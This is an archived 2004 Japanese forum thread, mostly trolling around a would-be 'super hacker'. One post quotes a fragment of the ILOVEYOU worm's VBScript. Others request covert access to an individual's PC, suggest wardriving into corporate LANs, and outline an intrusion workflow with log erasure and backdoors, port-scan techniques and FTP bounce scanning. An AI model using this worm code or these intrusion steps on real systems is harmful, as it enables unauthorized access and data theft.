トップページhack
1001コメント269KB

【本当に】スパーハカーへの道のり【真剣です】

■ このスレッドは過去ログ倉庫に格納されています
0001よちよちハカー04/06/18 14:49ID:???
主が困っているみたいだったので立てました。
文句のある方は>>2に言ってくださいね。
0129 04/06/28 22:54ID:Xb8+AoPl
厨くせぇーーーーー このスレめっさ厨くせぇーーーーー
0130 04/06/28 23:38ID:???
◆eRP3DPXYGcは何使ってるの?オフィスやだとかいいながら何でWin使うの?
素直に赤帽とかturboとかお金かけて使ってみればいいのに。
お金をむしりとるMS製品がいかにダメかわかるからね。
013113004/06/28 23:39ID:???
すまん。
ついhttp://pc5.2ch.net/test/read.cgi/hack/1087605285/のノリで親切になっちゃった。
ここは煽りスレだったよね。
0132 04/06/29 03:33ID:???
>>131
親切なレスを◇eRP3DPXYGcが煽るスレです
0133名無しさん ◆eRP3DPXYGc 04/06/29 06:57ID:px9nqXY1
>>128
自覚お疲れ様であります。

>>130
べつにMS製品に金かけてません。
ただパソコン買ったときについて来ただけですし。
> ◆eRP3DPXYGcは何使ってるの?
お馬鹿ですか?
字も読めない人はここに来ないでください。
0134名無しさん04/06/29 09:20ID:???
っていうかさ、UNIX始めるまで何ヶ月かかってんだよ。
本当はやる気もない。
釣るのが目的だと思われてもしょうがないと思うけどね。
0135 04/06/29 13:59ID:???
>>133
OSは何使ってるの?
当然bsdだよな?
まさかWinとかじゃないだろうなww
で、学校で配ってるってことはソースネクストのピーコ使ってるのかww

まあ適当に頑張れよ、Win厨ちゃんwwwwwwwwwwwww
0136名無しさん ◆eRP3DPXYGc 04/06/29 15:03ID:px9nqXY1
>ソースネクストのピーコ
??
僕はゲイじゃないのでピーコは使いません。
ソースネクストが一体どこからでて来たかも分かりません。
もしかして薬とかやってますか?
ttp://www.nco.go.jp/email/ncorespons.html
ここで自首でもしてはいかがですか?

でwinXP使ってますが君は使ってないんですか?
0137 04/06/29 22:59ID:ajXVOh7W
私なんかMeですよ
0138y0suke04/06/30 00:30ID:???
とりあえず◆eRP3DPXYGcが今までに参考にしたサイト・本を晒せ
話はそこからだ
0139名無しさん ◆eRP3DPXYGc 04/06/30 07:54ID:Q4Qmy1oX
>>138
2ch
暗号の本
perlの本
Cの本
TCP/IPの本
セキュリティの本
アセンブラの本
UNIXの本
クラッキングハウツー本
代数の本
JAVAの本
C++の本
・・・
とまああげればきりがありません。
そういう君はどんな本参考にしてるんですか?
話はそれからですよ窪漬け君。
0140y0suke04/06/30 21:07ID:???
>>139
2ch、Google、Yahoo!ジャパン(ディレクトリ掲載サイトのみ)、Delphiに関するサイト片っ端からプリントアウト
C言語 でヒットするサイト片っ端からプリントアウト、ハッカー・クラック関連の用語でヒットしたまともなサイト片っ端から
アセンブラ関係の用語でヒットするサイト片っ端からプリントアウト、UNIXは、、、本買った気がする_| ̄|○
0141名無しさん ◆eRP3DPXYGc 04/06/30 23:21ID:bLp8Iakt
>サイト片っ端から
この時点で嘘ばればれですよ。
印刷代だけでいったい何年分のモロヘイヤ買えると思ってるんですか?
大麻でもやってマンションから飛び降りてください。
0142y0suke04/07/01 00:06ID:???
>>141
>印刷代だけでいったい何年分
学校のプリンタ使ってるから・・・
0143__04/07/01 02:29ID:???
>>139
>UNIXの本
上のやり取りをみて「UNIXの本」を晒されても
ネタの香りしかしないのだが・・・
0144名無しさん ◆eRP3DPXYGc 04/07/01 07:56ID:fins3lLg
>>142
学校が可哀相です。

>>143
ネタだと思うのなら思っていてくれて結構です。
自分よりも僕が優れていることを認めたくないとしか思えません。
幼稚な方ですね。
0145y0suke04/07/01 08:28ID:???
>>144
>学校が可哀相です。
で?っていう
0146 04/07/01 14:57ID:???
◆eRP3DPXYGcはホント、アホだな。
この板と関係ありそうな本しか挙げてないしな。
何気に2chとかクラッキングハウツーとか挙げてるのは笑った。
んなもの参考になってるってレベルの奴はただの厨房ww

まあお前実際に日本語も不自由だしな。
「馬の耳に念仏」の次は「モロヘイヤ」かw
0147 04/07/01 16:28ID:???
過去の固定だかを真似ている時点で釣りだろ?
実際釣れまくってるが。

本気で聞きたいならもっとまともに物を聞くキャラを作って来い。
0148y0suke04/07/01 16:33ID:???
23 名前:名無しさん ◆eRP3DPXYGc [] 投稿日:04/06/20(日) 18:37 ID:FaP3CJ4v
>>22
良く分かりませんがウイルス界におけるビルゲイツ並の存在になったらスパーハカーだと思います。

違うべ。受け売りだけど、
自分がスパーハカーだと信じる 人 達 から、「お前スパーハカーだな」って言われたら、スパーハカーなんですよ
それまでは、ハカーですらなbュ、ハカー小僧だと 思います。

名無しに戻りますね
0149名無しさん ◆eRP3DPXYGc 04/07/01 17:24ID:fins3lLg
>>148
それは僕からの受け売りですね。

>>146
ネタをネタと受け取れないような人はここに来なくて良いです。
本気で「馬の耳に念仏」をあんな用法で使ったと思ってるんですか?

>>147
過去の固定を真似てるのは他の人だと思うのですが。
0150 04/07/01 18:21ID:???
>>149
もう反論しなくていいよ、「馬の耳に念仏」だろうからw
0151 04/07/01 18:30ID:eZlw5C+c
ポートスキャンソフト「○NAME」でスキャン
TELNETでアタック
これって只のサーバーテストなんだけど
0152 04/07/01 18:43ID:???
>>136で必死にとぼけてるが内心焦ってるなw
Starsuiteを日本で委託販売してるのはソースネクストだったよなw
それを配ってるのかよww

割れ厨一人タイーホですか?ww
0153 04/07/01 18:46ID:eZlw5C+c
ID解析でIPばれるから悪いことはできません。
0154sage04/07/01 18:47ID:???
149 名前:名無しさん ◆eRP3DPXYGc [] 投稿日:04/07/01(木) 17:24 ID:fins3lLg
>>148
それは僕からの受け売りですね。




今俺の脳内スパコンが404を弾き出しましたよ??
0155 04/07/01 19:11ID:???
>>139
具体的にどういう名前の書籍か教えてほしい。
参考にしたいから
0156 04/07/01 19:14ID:???
モロヘイヤでも食べてちょっとは痩せなよ。◆eRP3DPXYGc。
015704/07/01 19:20ID:HSaZlOcU
オライリーの本なんかは参考になりますか?
0158名無しさん ◆eRP3DPXYGc 04/07/01 19:38ID:fins3lLg
>>152
サイトライセンスって言うものも知らないんですか?

>>154
前スレで僕がそのようなことを言いました。

>>155
参考にした書籍なので覚えてません。
あんまりいじめないでください。

>>157
動物本は良い本と言われてますね。
英語なのは読めませんが。
0159__04/07/01 20:26ID:???
>>157
http://www.1point.jp/~book_2ch/index.html
0160 04/07/01 21:54ID:???
>>157
http://googlehack.hp.infoseek.co.jp/seo/index.html
ぐぐっただけだが。
0161名無しさん ◆eRP3DPXYGc 04/07/01 22:15ID:fins3lLg
>>159-160
何で君達は>>157には協力的なのに僕には冷たいんですか?
0162__04/07/01 22:31ID:???
>>161
散々言ってきただろうに…。
PC-UNIX入れてC言語勉強してカーネル等のバッファーオーバーフローを探す。
何一つやろうとしないで何を言っているのかよく分からん。
ツールや既に発見されたバグ付くのは厨房でもできる。
スパーハカーになりたいなら一つ一つクリアしていくしかないと思うよ。
がんばれ。
っていうかあまり人の事言える立場でもないが…。
0163 04/07/01 22:43ID:???
>>161
知識がある
知識があって知的好奇心がある
知識があって知的好奇心があって探求心がある
知識があって知的好奇心があって探求心があって自主的な思考力がある

君は今までのレスから、どれに当てはまるかな?
016415704/07/01 22:51ID:???
オライリーそれなりに参考になるってことでいいですか?
0165__04/07/01 22:55ID:???
>>164
オライリーと一言で言われてもいろんな本が出てるでしょ?
まず何をやりたいのか、どれ位のレベルの人なのかも分からないので >>159
中から自分にあった本を探して欲しい。
0166 04/07/01 22:57ID:???
>>164
ああ。
0167__04/07/01 23:05ID:???
>>166
お気持ちはお察しします。(^^;
0168名無しさん ◆eRP3DPXYGc 04/07/01 23:38ID:fins3lLg
>>162
>PC-UNIX入れてC言語勉強してカーネル等のバッファーオーバーフローを探す
いれました。
勉強しました。
でもみつかりませんでした。
0169__04/07/02 00:01ID:???
>>168
そう簡単にはいかないと思うよ。
そこがUNYUNさんがみんなに尊敬されてる理由だと思う。
そういえば R00t Zer0さんってどこに行ったんだろう???
0170名無しさん ◆eRP3DPXYGc 04/07/02 00:10ID:0oLRponS
>>169
UNYUNって尊敬されてましたか?
そんな話は聞いたこと無いんですが。
0171__04/07/02 00:33ID:???
>>170
うーん…。
とりあえず、BEAMZさんの件での一番の功労者だと思う。
0172__04/07/02 00:40ID:???
自分でふっておいてアレだけど。
これ以上の話は
A.D.200X@Random (16)
http://pc5.2ch.net/test/read.cgi/sec/1079798496/
【kero】ヤフーBB顧客情報流出【かえる】
http://pc5.2ch.net/test/read.cgi/sec/1086097151/
が適切かも…。
0173名無しさん04/07/02 20:55ID:???
何も書き込みがなくなってしまったようなので話題を・・・。

無料でインターネット
 ホットスポットを使えば無料でインターネットができる。

企業ハック
 企業等でも無線LANが増えてきたので無線LANカードを挿してノートパソコン
 を持って移動すると企業のLANにも入れるかも…。
 インターネットも出来て共有ファイルも頂けちゃうかもね。
0174名無しさん ◆eRP3DPXYGc 04/07/02 21:40ID:0oLRponS
>>173
なにがしたいんですか?君は
0175 04/07/02 22:28ID:???
>>174
悪いではなく、何がしたいのか聞いてる所がモエ
0176名無しさん ◆eRP3DPXYGc 04/07/02 23:56ID:0oLRponS
>>175
オタクはキモいので秋葉原から出て来ないでください。
0177 04/07/03 11:08ID:???
「自称天才」の固定はかならず馬鹿なのは仕様ですか?
まあ、馬の耳に念仏でしょうが。

>何も書き込みがなくなってしまったようなので話題を・・・。
馬鹿の相手も飽きたと思われ。
0178名無しさん ◆eRP3DPXYGc 04/07/03 17:25ID:dIlUWfcI
>>177
馬鹿馬鹿と人のこと言いますけどここの住人が煽るだけでちゃんとしたハッキングの話ができないだけだと思います。
次スレは他の板にたてるしかありませんね。
0179 04/07/03 19:39ID:???

>>178
>>163
0180 04/07/03 20:04ID:???
ちゃんとしたハッキングの話をしようにも◆eRP3DPXYGcさんが煽るので
話ができないだけだと思います。

次スレはPC初心者板に
【教えて】スパーハカーになりたいのですが…【構って】で決定ですね。
0181名無しさん ◆eRP3DPXYGc 04/07/03 20:11ID:dIlUWfcI
>>180
僕がいつ煽りましたか?
真面目にハッキングの話してない人にしか煽ったことはありません。

それに次スレはUNIX板にでもたてようかと思っています。
0182 04/07/03 21:36ID:???
UNIX板…まぁ、背伸びもほどほどにな。
Linux板のほうがいいと思うが…どうせLinuxというかPC-UNIXしかいじった事ないんだろうし
0183名無しさん ◆eRP3DPXYGc 04/07/03 22:59ID:dIlUWfcI
>>182
今少し見て来ましたがLinux板はダメですね。
UNIX板もハカーになるために良い板だとは思えませんでしたけど。
0184 04/07/04 01:13ID:???
名無しさん ◆eRP3DPXYGcさんに聞きたいんですけど
どうやったら書き込みができるんですか?
教えてください。頼みます。
0185(´;ω;`)04/07/04 07:43ID:???
ほんと、ここには低能釣り師、煽り厨ばっかで今まで主と渡り合えるヤシは皆無。
散々低能ぶりを発揮しては主に論破されすごすご退散。
自身過剰もここまでくれば ネ申 だね。
よっぽどの自信が無い限り書き込むな、
見苦しい。
0186 04/07/04 08:16ID:???
>>185
縦読みにしてはつまんねーな
0187 04/07/04 14:16ID:???
>>186
まいどおなじみの自作自演だからな
0188 ◆KA7ddtB5Dw 04/07/04 14:42ID:???
>>23から察するに
◆eRP3DPXYGc は侵入には興味がなくて
ウイルスを作りたいってだけのことか?
例えばこんなのとか
-----------------------------------------------
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
-----------------------------------------------
0189名無しさん ◆eRP3DPXYGc 04/07/04 15:58ID:1SfTpu8Q
>>188
国語勉強して来てください。

>>187
いつもアホな発言ご苦労さまであります。


ホントにこの板終ってますね。
悲しいです。
何ら思い入れはありませんが。
0190 04/07/04 16:48ID:???
>>189
>>163

早く早く
0191 04/07/04 16:51ID:???
煽りのセンスも国語力も乏しく
更に知識程度も知れている◆eRP3DPXYGcに何ら未練はありませんが。

未練がない割には未練がましくレスつけてるしな。
きっとみんな君を見てるよ。みんな生暖かく見守ってるに違いない。

◆eRP3DPXYGcという厨房を…
0192 04/07/04 17:13ID:hgBdoaNj
昭和六十三年に起きた「女子高生コンクリート詰め殺人事件」で逮捕された
少年四人のうちの一人が、知り合いの男性を監禁して殴るけるの暴行を加え
たとして、警視庁竹の塚署に逮捕監禁致傷の疑いで逮捕されていたことが
三日、分かった。

逮捕されたのは埼玉県八潮市、コンピューター会社アルバイト、神作譲容疑者
(三三)。
0193名無しさん ◆eRP3DPXYGc 04/07/04 17:24ID:1SfTpu8Q
>>190
どれにも当てはまりません

>>191
何か意味とおってませんよ。


もういい加減煽るのはやめて本題にはいりましょう。
0194 04/07/04 19:13ID:???
>>193
ハッキングのやり方教えてください。対象OSはwinXPです。1個人を狙っています。
IEにトロイやキーロガーで取得したデータを渡し、IE経由で自分のPCに流すとかは、無しで。

相手のパスやキーのログが欲しいです。 相手のCドライブ内のファイルも自由にダウソしたいです。
他言しません。解説サイトも教えてくれると嬉しいです。
0195スレジャック ◆KA7ddtB5Dw 04/07/04 23:28ID:???
■ハッキングの流れ

ハッキングの基本的な流れは次のようなものになります。
このハッキングでターゲットとなるのはUNIXやWindowsNT/2000/XPなどの
サーバーが対象となります。
各種OSによる具体的な方法は、この概念を理解してから読むと、
よく理解できることでしょう。

1:ターゲッティング
2:スキャン
3:間接的アタック
4:ローカルアタック
5:リモートアタック
6:ログ消去またはログ偽装
7:徘徊
8:タイムスタンプの改竄
9:バックドア

次回より、それぞれについて詳しく解説していきます。
0196 04/07/05 00:24ID:???
>>195
よろしく頼むよ
0197名無しさん ◆eRP3DPXYGc 04/07/05 17:00ID:/4+taPtp
>>195
次はまだですか?
0198   04/07/05 17:29ID:???
…で、何の受け売りですか?(・∀・)ニヤニヤ
0199 04/07/05 17:59ID:???
プロバイダのホームページ上にユーザのホームページが紹介されなく
なった昨今 Joeアカウントを探すのも大変だと思われ。
どうやってターゲットを探すのか興味津々。
0200 04/07/05 19:01ID:???
http://www.itmedia.co.jp/anchordesk/articles/0407/05/news046.html?nc20
0201 04/07/05 19:12ID:???
女の腐った様な奴=◆eRP3DPXYGc
0202名無しさん ◆eRP3DPXYGc 04/07/06 07:19ID:7yIvdzlp
結局>>195さんはしったかヘタれ野郎ですか。

>>201
女の腐った奴と言われてもそれほど傷つきません。
男の腐った奴=201さんよりはましです。
0203 04/07/06 07:54ID:sCAOj2MJ
↓こんなの見つけました

http://webnews.fc2web.com
0204かな04/07/06 10:47ID:8omGNFrj
どなたかわたしのIP抜いてもらえませんか?
自分でできなくて困ってます
ハカーの方よろしくお願いしますm(_ _)m
0205スレジャック ◆KA7ddtB5Dw 04/07/06 11:19ID:???
1:ターゲッティング

 このターゲッティングとはターゲットとなるサーバーを慎重に選び、
そのサーバーの情報を間接的に集めることです。

2:スキャン

 スキャンと言っても様々なものが存在します。アタック方法として例えば、
Pingスイープ、ポートスキャン、 OS特定、アタックフィンガープリンティング、
ネットワークリソースの列挙、ユーザー・グループの列挙、アプリケーションバナー
の列挙などがあります。
これらのスキャンによってターゲットの弱点となるセキュリティホールを
探し出します。慎重な人はターゲッティングとスキャンでターゲットの情報を
先にしっかり集めてから行動します。
一方、Script Kiddiesは、現在、持っているExploitで効果があるかないかは別として
とりあえずアタックしておくという行動を取ります。もちろん失敗すればログが残って
しまいます。
0206名無しさん ◆eRP3DPXYGc 04/07/06 14:35ID:neamt6WV
>>205
いろいろ詳しい方が来ましたね。
って僕が聞いているのはどうやってなるかなんですが許してあげましょう。
てか今気づいたんですがスレジャックって名前はよろしくないと思います。
よそでやる分には良いのですがここでは僕が唯一神なのでやめてください。
したがって、その名を改めないならば、唯一神又吉イエスが地獄の火の中に投げ込む者である。
0207 04/07/06 14:41ID:???
何かと思ったら…
やっぱり◆eRP3DPXYGcみたいな馬鹿の常駐するスレには馬鹿しかこないか…

ハックラ板の燃えカスここに消える

って◆eRP3DPXYGcはやっぱり多段じゃん。
天才の次は神かw
0208名無しさん ◆eRP3DPXYGc 04/07/06 14:47ID:neamt6WV
多段というならソースだしてください。
どうせ出せないと思いますが。
0209 04/07/06 17:17ID:???
>>205
akademeiaのサイトのコピペ乙
0210名無し@休憩中04/07/06 21:47ID:???
ネ申なら自分でスレたてろ、引篭もりめ!

PS.仕事が終わらない・・・orz
0211名無しさん ◆eRP3DPXYGc 04/07/06 22:08ID:neamt6WV
>>210
せめて仕事終えてから意見言ってください。

まともな人はそろそろ登場してください。
このスレも何もないまま終ってしまうととても悲しいです。
0212 ◆SSS6666666 04/07/07 06:19ID:???
では実際にポートスキャンはどのようにして行われるのでしょうか。
まず、ポートスキャンを行うには、相手を絞る必要があります。
この相手を絞るためのものはいくつかありますが、たとえば次のようなものです。

* 急激に人気の出たサイト
* 新規構築されたサイト
* 個人やSOHOなどで使用されやすい常時接続サイト
* ダイレクトメールなどの一覧から割り出したサイト
* ドメイン一覧の順

このように、ある程度対象を絞ります。
次に対象となるサイトがどのIPアドレスを使用しているかを調べます。
これは、ドメイン情報から簡単に確認することができます。
0213 ◆SSS6666666 04/07/07 06:19ID:???
今回は、NetScanTools4.12を使用して実際に行ってみましょう。
このツールは元々管理用として作成されたもので、Ping, TraceRoute, Whois, nslookup,
ポートスキャンなど、さまざまなチェックが可能です。
なお、テストはLAN内で行います。間違っても、外部のWebサーバーに行ってはいけません。

スキャン対象となるサイトのIPアドレスの範囲が割り出せると、
実際にどのIPアドレスにホストが接続されているかを調べる作業に入ります。
例えば、スキャン対象のサイトには192.168.0.1というIPアドレスが実際に使用されているとします。
それでは、このIPアドレス(192.168.0.1)に対してどのポートが
開いているかをポートスキャンによって確認してみます。

例えば、対象となるホストはポート 21,22,23,25,111 が空いているとします。
このポートに対して攻撃を行うことになります。
攻撃する側からは、 闇雲に攻撃を仕掛けるのでは時間と労力の無駄になります。
たとえば、存在しないホストに対して攻撃するほど無駄なことはないでしょう。
同様に、空いてもいないポートに対して攻撃を行っても大きな意味はありません。
ただし、ポートスキャンで空いていないポートにも攻撃を行うことは可能です。
空いていないポートが安全なのではなく、空いているより良いという程度に考えておくようにしてください。
0214 ◆SSS6666666 04/07/07 06:19ID:???
ポートスキャンにはいくつかの方法があります。 どれもTCP/IPの特性を利用したものです。

TCPスキャン(TCP):
標的ポートに接続し、3wayハンドシェークと呼ばれるSYN-SYN/ACK-ACKのシーケンスを実行します。
被攻撃サイトにおいてスキャン行為の検出は容易。

SYNスキャン(TCP):
完全なTCP接続を行わないスキャン手法です。
ハーフオープンスキャンまたはステルススキャンと呼ばれています。 代わりに、SYNパケットを標的のポートに送信する。

・ 標的ポートからSYN/ACKを受信した場合のポートはリスン状態
・ 標的ポートからRST/ACKを受信した場合のポートは非リスン状態

FINスキャン(TCP):
標的にFINパケットを送信するスキャン手法です。
標的ホストは、RFC793に基づき、 クローズした全てのポートにRSTを送り返さなければなりません。
この手法は、UNIXのBSDソケットにしか通用しません。

クリスマスツリースキャン(TCP):
標的ポートに、FIN,URG,PUSHパケットを送信するスキャン手法です。
FINスキャン同様、標的ホストはクローズした全てのポートについて RSTを送り返さなければなりません。

NULLスキャン(TCP):
全てのフラグを"0"にするスキャン手法。
FINスキャン同様、標的ホストはクローズした全てのポートについて RSTを送り返さなければなりません。

UDPスキャン(TCP):
標的ポートにUDPパケットを送信。標的ポートが "ICMP port unreachable" というメッセージで応答した場合、
ポートはクローズされていることを確認するスキャン手法です。
パケットフィルタリングを施したデバイスに対するUDPスキャンは、 比較的時間がかかります。
また、UDPの性質上、ネットワーク越しにスキャンを行う場合の信頼性は非常に低くなります。
0215 ◆SSS6666666 04/07/07 06:20ID:???
スタックフィンガープリンティングとは、ホストのOSを特定するものです。
OSが特定されるとその攻撃方法の範囲が決まります。
以下で紹介するnmap は元々管理用として作成されたものであり、自組織内部で利用するものです。
管理用のツールによってポートがオープンされていなくてもOS特定が可能となります。

* FINプローブ
* 偽フラグプローブ
* ISN(Initial Sequece Number)サンプリング
* フラグメント処理
* 非フラグメントビット処理
* TCP初期ウィンドウサイズ
* ICMPエラーメッセージ抑制
* ICMPメッセージ引用
* ICMPエラーメッセージエコーインテグリティ
* TOS
* TCPオプション
0216 ◆SSS6666666 04/07/07 06:23ID:???
Anonymous FTPによるポートスキャン

サーバ側でポートスキャンの状況をロギングしにくい方法があります。
この方法の一つがAnonymous FTPを使用したポートスキャンです。
FTPは、コマンドとデータの通信では異なるポートを利用します。
これによって、ロギング上ではFTPの利用として見える訳なのです。
しかし、下記のように500番代のエラーを返すFTPサーバのソフトウェアを使用するか、
設定を加えることでFTPによるポートスキャンは回避することができます。

1. Anonymous FTPにtelnet(ポート21)で接続する。
2. ユーザ名anonymousでログイン。
user anonymous
3. パスワードとしてメールアドレスを入力します。
pass [email protected]
4. PORTコマンドでIPアドレスとポート番号を送ります。
port IPアドレス,ポート1,ポート2
ここで、500番台の数字が返された場合、 このAnonymous FTPサーバではポートスキャンを行うことができません。
5. もしPORTコマンドが利用可能であればLISTコマンドでファイルリストを取得
list
6. PORTコマンドの結果を確認
指定されたポートが開いているならば150が返され、 ポートが開いていないならば425が返されます。
425 Can't build data connection: Connection refused.
0217y0suke04/07/07 06:45ID:???
>>214
はいはい。
ステルススキャンされると分かっている場合、被スキャン対象になっている側はどういうツールを用いて
スキャンのログを収めるべきなのでしょうか?お勧めツールをいくつか紹介下さいな
0218名無しさん ◆eRP3DPXYGc 04/07/07 11:21ID:VDan9/qw
>>212-216
いい加減こんな下らないことでスレ汚さないでください。
0219 ◆SSS6666666 04/07/07 11:34ID:???
>>218
調子乗ってました。
シャワー浴びてウンコプールいって吊って来ます。
0220 04/07/07 12:02ID:???
んー。
多段ちゃんは大学生になれたんだ。
で、大学生になってもやっぱり引き篭もりなの。

どうせ脳内設定だろうけど、
平日の講義が設定されてる時間に、
PCや携帯でインターネット使って2ちゃんねるにアクセスして即レス付ける馬鹿はいないよ。
講義中だしね。

誤魔化すなら、もう少し書き込み時間考えなきゃ、ね。
多段ちゃん大好きなあの板なら、誤魔化せるのかもしれないけど。
0221名無しさん ◆eRP3DPXYGc 04/07/07 12:21ID:VDan9/qw
>>220
いまだに僕を多段だと想ってる人って脳内が単純で良いですね。
それに大学生で毎日学校良く奴なんていませんよサークル除けば。
高卒には分からないかも知れませんが
0222ぴよぴよハッカー04/07/07 14:06ID:pxiqrtDS
>◆SSS6666666さん
私はあうぽを使っています
ポートから進入された時のログ、
何か情報を引き出された場合のログはどうなりますか?
また、ポートから引き出す情報を具体的に教えてください。
0223 ◆SSS6666666 04/07/07 14:25ID:???
>>222
うんこー
うんこー
0224名無しさん ◆eRP3DPXYGc 04/07/07 18:18ID:VDan9/qw
もうこのスレ馬鹿ばっかです。
真面目にしないと君達のお母さんにいって注意してもらうぞ。
0225 04/07/07 18:47ID:???
僕・・・お母さん・・・いない・・・ぽ
0226ぴよぴよハッカー04/07/07 19:00ID:???
早く教えれ
0227名前いれてちょ。。。04/07/07 19:31ID:YtEH55DS
>>221
講義でないで自分で勉強してるって事?
0228名無しさん ◆eRP3DPXYGc 04/07/07 19:40ID:VDan9/qw
>>225
ごめんなさい。

>>227
そういう教科もありますがそんな毎日授業なんて無いってことです。
それに全出席なんてみんながみんなしてるわけないじゃないですか。
小学校じゃあるまいし。
0229_04/07/07 21:22ID:???
構ってクンの巣窟になっている事に気付いていない->◆eRP3DPXYGc
まずスルーを覚えることを強くお勧めする

>212-216
自鯖のセキュリティチェックのやり方だよな?
常時上げカキする阿呆がいるから黙って頷いとけ
■ このスレッドは過去ログ倉庫に格納されています